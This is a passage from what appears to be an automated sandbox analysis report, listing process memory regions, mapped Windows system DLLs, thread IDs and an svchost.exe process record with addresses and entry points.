"cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" Region: id = 1838 start_va = 0x75c00000 end_va = 0x75c0bfff entry_point = 0x75c010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 1839 start_va = 0x75ca0000 end_va = 0x75cadfff entry_point = 0x75ca1235 region_type = mapped_file name = "RpcRtRemote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" Region: id = 1840 start_va = 0x75f30000 end_va = 0x75f79fff entry_point = 0x75f37de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 1841 start_va = 0x75fb0000 end_va = 0x75fcefff entry_point = 0x75fb1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 1842 start_va = 0x76010000 end_va = 0x7605dfff entry_point = 0x76019c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 1843 start_va = 0x76110000 end_va = 0x761b0fff entry_point = 0x76142433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 1844 start_va = 0x761c0000 end_va = 0x7626bfff entry_point = 0x761ca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 1845 start_va = 0x76270000 end_va = 0x76338fff entry_point = 0x7628d711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 1846 start_va = 0x77130000 end_va = 0x771cffff entry_point = 0x771449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 1847 start_va = 0x77580000 end_va = 0x7761cfff entry_point = 0x775b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 1848 start_va = 0x77620000 end_va = 0x7777bfff entry_point = 0x7766ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 1849 start_va = 0x77780000 end_va = 0x77853fff entry_point = 0x777cbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 1850 start_va = 0x77a00000 end_va = 0x77a8efff entry_point = 0x77a03fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 1851 start_va = 0x77a90000 end_va = 0x77b5bfff entry_point = 0x77a9168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 1852 start_va = 0x77b60000 end_va = 0x77c9bfff entry_point = 0x77b60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 1853 start_va = 0x77ca0000 end_va = 0x77ca5fff entry_point = 0x77ca1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" Region: id = 1854 start_va = 0x77cc0000 end_va = 0x77cc9fff entry_point = 0x77cc136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 1855 start_va = 0x77ce0000 end_va = 0x77cf8fff entry_point = 0x77ce4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 1856 start_va = 0x77d00000 end_va = 0x77d82fff entry_point = 0x77d023d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" Region: id = 1857 start_va = 0x77da0000 end_va = 0x77da0fff entry_point = 0x77da0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 1858 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1859 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1860 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1861 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1862 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1863 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1864 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1865 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1866 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1875 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x1e89f9 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" Region: id = 1876 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 1877 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 1878 start_va = 0x75c10000 end_va = 0x75c6efff entry_point = 0x75c12134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" Region: id = 1879 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1880 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2252 start_va = 0x1e0000 end_va = 0x1e3fff entry_point = 0x1e0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" Region: id = 2253 start_va = 0x1110000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 2254 start_va = 0x6f6b0000 end_va = 0x6f709fff entry_point = 0x6f6b1f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" Region: id = 2255 start_va = 0x74130000 end_va = 0x7413ffff entry_point = 0x741338c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" Region: id = 2256 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 2257 start_va = 0x1050000 end_va = 0x105ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 2258 start_va = 0x1080000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 2259 start_va = 0x1170000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 2260 start_va = 0x72bd0000 end_va = 0x72be4fff entry_point = 0x72bd325e region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" Region: id = 2261 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 2271 start_va = 0x1120000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 2272 start_va = 0x6ed50000 end_va = 0x6ed57fff entry_point = 0x6ed52ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" Region: id = 2273 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 2294 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 2295 start_va = 0x1220000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 2296 start_va = 0x6ec30000 end_va = 0x6ec3cfff entry_point = 0x6ec31392 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" Region: id = 2297 start_va = 0x6ec40000 end_va = 0x6ec42fff entry_point = 0x6ec40000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" Region: id = 2298 start_va = 0x6ec50000 end_va = 0x6ec61fff entry_point = 0x6ec541ab region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" Region: id = 2299 start_va = 0x6eca0000 end_va = 0x6ed2ffff entry_point = 0x6eca1a64 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" Region: id = 2300 start_va = 0x71eb0000 end_va = 0x71f10fff entry_point = 0x71eb3921 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" Region: id = 2301 start_va = 0x729f0000 end_va = 0x72a3bfff entry_point = 0x729f2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" Region: id = 2302 start_va = 0x747e0000 end_va = 0x747f2fff entry_point = 0x747e1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" Region: id = 2303 start_va = 0x75200000 end_va = 0x75208fff entry_point = 0x75201220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" Region: id = 2304 start_va = 0x75bc0000 end_va = 0x75bc7fff entry_point = 0x75bc10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" Region: id = 2305 start_va = 0x75be0000 end_va = 0x75bfafff entry_point = 0x75be93b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" Region: id = 2306 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 2307 start_va = 0x1260000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 2308 start_va = 0x1370000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 2309 start_va = 0x75fd0000 end_va = 0x76004fff entry_point = 0x75fd145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" Region: id = 2310 start_va = 0x11c0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 2311 start_va = 0x1520000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 2312 start_va = 0x72c80000 end_va = 0x72c86fff entry_point = 0x72c8128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" Region: id = 2313 start_va = 0x72c90000 end_va = 0x72cabfff entry_point = 0x72c9a431 region_type = mapped_file name = "IPHLPAPI.DLL" filename = "\\Windows\\System32\\IPHLPAPI.DLL" Region: id = 2314 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 2331 start_va = 0x13b0000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 2332 start_va = 0x14e0000 end_va = 0x151ffff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 2333 start_va = 0x15f0000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 2334 start_va = 0x75340000 end_va = 0x75355fff entry_point = 0x75342061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" Region: id = 2335 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 2336 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 2427 start_va = 0xff0000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 2428 start_va = 0x10c0000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 2429 start_va = 0x731c0000 end_va = 0x7320efff entry_point = 0x731c1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" Region: id = 2430 start_va = 0x73210000 end_va = 0x73267fff entry_point = 0x732113b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" Region: id = 2431 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 2432 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 2438 start_va = 0xf90000 end_va = 0x104ffff entry_point = 0xf90000 region_type = mapped_file name = "KernelBase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" Region: id = 2439 start_va = 0x75450000 end_va = 0x75457fff entry_point = 0x754534d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" Region: id = 2440 start_va = 0x77860000 end_va = 0x778b6fff entry_point = 0x77879ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 2446 start_va = 0x1580000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 2447 start_va = 0x16f0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 2448 start_va = 0x6e9b0000 end_va = 0x6e9bffff entry_point = 0x6e9b1526 region_type = mapped_file name = "NapiNSP.dll" filename = "\\Windows\\System32\\NapiNSP.dll" Region: id = 2449 start_va = 0x75600000 end_va = 0x75643fff entry_point = 0x756163f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" Region: id = 2450 start_va = 0x6e990000 end_va = 0x6e9a1fff entry_point = 0x6e9918f2 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" Region: id = 2451 start_va = 0x75740000 end_va = 0x7577bfff entry_point = 0x7574145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" Region: id = 2452 start_va = 0x6ea30000 end_va = 0x6ea37fff entry_point = 0x6ea3131e region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" Region: id = 2453 start_va = 0x75290000 end_va = 0x75294fff entry_point = 0x752915df region_type = mapped_file name = "WSHTCPIP.DLL" filename = "\\Windows\\System32\\WSHTCPIP.DLL" Region: id = 2454 start_va = 0x75730000 end_va = 0x75735fff entry_point = 0x75731673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" Region: id = 2455 start_va = 0x6f710000 end_va = 0x6f715fff entry_point = 0x6f7114b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" Region: id = 2456 start_va = 0x72470000 end_va = 0x724a7fff entry_point = 0x7247990e region_type = mapped_file name = "FWPUCLNT.DLL" filename = "\\Windows\\System32\\FWPUCLNT.DLL" Region: id = 2649 start_va = 0x17e0000 end_va = 0x181ffff entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 2650 start_va = 0x72450000 end_va = 0x7245cfff entry_point = 0x72452012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" Region: id = 2651 start_va = 0x72430000 end_va = 0x72441fff entry_point = 0x72433271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" Thread: id = 147 os_tid = 0x434 Thread: id = 148 os_tid = 0x428 Thread: id = 149 os_tid = 0x41c Thread: id = 150 os_tid = 0x40c Thread: id = 151 os_tid = 0x408 Thread: id = 152 os_tid = 0x3f4 Thread: id = 153 os_tid = 0x698 Thread: id = 154 os_tid = 0x69c Thread: id = 193 os_tid = 0x8cc Thread: id = 194 os_tid = 0x8d0 Thread: id = 195 os_tid = 0x8d4 Thread: id = 199 os_tid = 0x8f0 Thread: id = 201 os_tid = 0x904 Thread: id = 203 os_tid = 0x910 Thread: id = 204 os_tid = 0x914 Thread: id = 206 os_tid = 0x92c Thread: id = 209 os_tid = 0x944 Thread: id = 211 os_tid = 0x958 Thread: id = 241 os_tid = 0xa08 Thread: id = 243 os_tid = 0xac0 Thread: id = 247 os_tid = 0xb50 Thread: id = 268 os_tid = 0xba0 Thread: id = 272 os_tid = 0xbd8 Process: id = "17" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f0a81a0" os_pid = "0x338" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x470" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" Region: id = 2028 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2029 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2030 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2031 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2032 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 2033 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2034 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2035 start_va = 0xe0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2036 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2037 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 2038 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 2039 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 2040 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2041 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2042 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 2043 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2044 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 2045 start_va = 0x360000 end_va = 0x361fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 2046 start_va = 0x370000 end_va = 0x371fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 2047 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2048 start_va = 0x3d0000 end_va = 0x3d7fff entry_point = 0x3d2104 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" Region: id = 2049 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 2050 start_va = 0x4f0000 end_va = 0x56ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 2051 start_va = 0x570000 end_va = 0x962fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2052 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 2053 start_va = 0x9e0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 2054 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 2055 start_va = 0xa90000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 2056 start_va = 0xad0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 2057 start_va = 0xb10000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 2058 start_va = 0xb70000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 2059 start_va = 0xbb0000 end_va = 0xe7efff entry_point = 0xbb0000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 2060 start_va = 0xef0000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 2061 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 2062 start_va = 0xf80000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 2063 start_va = 0xff0000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 2064 start_va = 0x10a0000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 2065 start_va = 0x1190000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 2066 start_va = 0x11d0000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 2067 start_va = 0x12e0000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 2068 start_va = 0x13a0000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 2069 start_va = 0x13e0000 end_va = 0x141ffff entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 2070 start_va = 0x14d0000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 2071 start_va = 0x70280000 end_va = 0x7039dfff entry_point = 0x702a258c region_type = mapped_file name = "sysmain.dll" filename = "\\Windows\\System32\\sysmain.dll" Region: id = 2072 start_va = 0x72810000 end_va = 0x7281afff entry_point = 0x7281245b region_type = mapped_file name = "uxsms.dll" filename = "\\Windows\\System32\\uxsms.dll" Region: id = 2073 start_va = 0x73490000 end_va = 0x734b4fff entry_point = 0x734977be region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" Region: id = 2074 start_va = 0x740f0000 end_va = 0x74124fff entry_point = 0x740f2156 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" Region: id = 2075 start_va = 0x741e0000 end_va = 0x7425cfff entry_point = 0x741e166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" Region: id = 2076 start_va = 0x74260000 end_va = 0x74284fff entry_point = 0x74263bf0 region_type = mapped_file name = "PeerDist.dll" filename = "\\Windows\\System32\\PeerDist.dll" Region: id = 2077 start_va = 0x74290000 end_va = 0x74317fff entry_point = 0x742a0e2b region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" Region: id = 2078 start_va = 0x74370000 end_va = 0x74376fff entry_point = 0x743710c0 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" Region: id = 2079 start_va = 0x74380000 end_va = 0x743a4fff entry_point = 0x74382b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" Region: id = 2080 start_va = 0x743b0000 end_va = 0x74429fff entry_point = 0x743c4540 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" Region: id = 2081 start_va = 0x74690000 end_va = 0x7469cfff entry_point = 0x746911e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" Region: id = 2082 start_va = 0x747b0000 end_va = 0x747defff entry_point = 0x747b1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" Region: id = 2083 start_va = 0x74800000 end_va = 0x74838fff entry_point = 0x7480e2de region_type = mapped_file name = "MMDevAPI.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" Region: id = 2084 start_va = 0x74b50000 end_va = 0x74c44fff entry_point = 0x74b60d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" Region: id = 2085 start_va = 0x74c90000 end_va = 0x74e2dfff entry_point = 0x74cbe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" Region: id = 2086 start_va = 0x75310000 end_va = 0x7531afff entry_point = 0x7531129b region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" Region: id = 2087 start_va = 0x75340000 end_va = 0x75355fff entry_point = 0x75342061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" Region: id = 2088 start_va = 0x75360000 end_va = 0x75376fff entry_point = 0x75361c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" Region: id = 2089 start_va = 0x75520000 end_va = 0x7555afff entry_point = 0x7552128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" Region: id = 2090 start_va = 0x75780000 end_va = 0x75795fff entry_point = 0x75782dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" Region: id = 2091 start_va = 0x75910000 end_va = 0x7592afff entry_point = 0x75911286 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" Region: id = 2092 start_va = 0x75be0000 end_va = 0x75bfafff entry_point = 0x75be93b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" Region: id = 2093 start_va = 0x75c00000 end_va = 0x75c0bfff entry_point = 0x75c010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 2094 start_va = 0x75c70000 end_va = 0x75c98fff entry_point = 0x75c76b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" Region: id = 2095 start_va = 0x75ca0000 end_va = 0x75cadfff entry_point = 0x75ca1235 region_type = mapped_file name = "RpcRtRemote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" Region: id = 2096 start_va = 0x75cb0000 end_va = 0x75cbafff entry_point = 0x75cb1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" Region: id = 2097 start_va = 0x75d30000 end_va = 0x75d41fff entry_point = 0x75d31441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" Region: id = 2098 start_va = 0x75f30000 end_va = 0x75f79fff entry_point = 0x75f37de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 2099 start_va = 0x75f80000 end_va = 0x75fa6fff entry_point = 0x75f858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" Region: id = 2100 start_va = 0x75fb0000 end_va = 0x75fcefff entry_point = 0x75fb1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 2101 start_va = 0x76010000 end_va = 0x7605dfff entry_point = 0x76019c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 2102 start_va = 0x76110000 end_va = 0x761b0fff entry_point = 0x76142433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 2103 start_va = 0x761c0000 end_va = 0x7626bfff entry_point = 0x761ca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 2104 start_va = 0x76270000 end_va = 0x76338fff entry_point = 0x7628d711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 2105 start_va = 0x76340000 end_va = 0x764dcfff entry_point = 0x763417e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" Region: id = 2106 start_va = 0x764e0000 end_va = 0x77129fff entry_point = 0x76561601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" Region: id = 2107 start_va = 0x77130000 end_va = 0x771cffff entry_point = 0x771449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" 